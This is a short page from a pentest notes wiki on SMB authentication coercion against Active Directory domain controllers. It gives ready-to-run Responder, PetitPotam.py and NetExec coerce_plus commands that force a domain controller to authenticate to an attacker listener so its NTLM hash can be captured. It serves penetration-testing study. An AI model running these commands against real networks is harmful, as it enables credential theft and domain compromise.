⚔️
DWSec Wiki
  • Welcome to the DWSec Notes
  • Windows Privilege Escalation
  • Active Directory
    • Fundamentals
      • Introduction
      • Protocols
      • Authentication
      • Glossary of terms
      • Objects
      • AD CS
    • Pentest Methodology
    • Insecure Logins
    • Bloodhound & ldapdomaindump
    • NTLMRelaying (445)
    • SMB Coercing (445)
    • Pre2k
    • DACL Abuse
    • Kerberoasting
    • Utility Tools
    • Powershell
  • Networking
    • Fundamentals
    • Pivoting, Tunneling and Portforwarding
    • DNS
    • Ligolo-ng
    • Toolbox
    • Protocols
      • 80/443 - HTTP/HTTPS
      • 389 - LDAP
      • 445 - SMB
  • Web
    • Active Enumeration
    • Passive Enumeration
  • ADPwn
  • Tools
    • Tools overview
Powered by GitBook
On this page
  • Basics
  • Attacks
  • PetitPotam

Was this helpful?

  1. Active Directory

SMB Coercing (445)

PreviousNTLMRelaying (445)NextPre2k

Last updated 3 months ago

Was this helpful?

Basics

SMB Coercing is a method to force the domain controller to authenticate against our host. Within this attack we can capture the NetNLM hash. Currently there are multiple possible ways to coerce smb. A well-known method is to use the Encrypting File System Remote Protocol (MS-EFSR) and the PetitPotam script. Other ways using impackets ntlmrelay.py script. These will be added to this wiki in later versions.

Coercing can be thought of as a higher escalation level or advanced method of NTLM relaying. See:

Attacks

PetitPotam

Preparation:

Check if Responder is running

sudo responder -I <INTERFACE>

Coercing execution:

PetitPotam.py

python3 ./PetitPotam.py <DOMIAN> <LISTENER_IP> <TARGET_IP>

NetExec

nxc smb <ip> -u '' -p '' -M coerce_plus
nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP>

NTLMRelaying (445)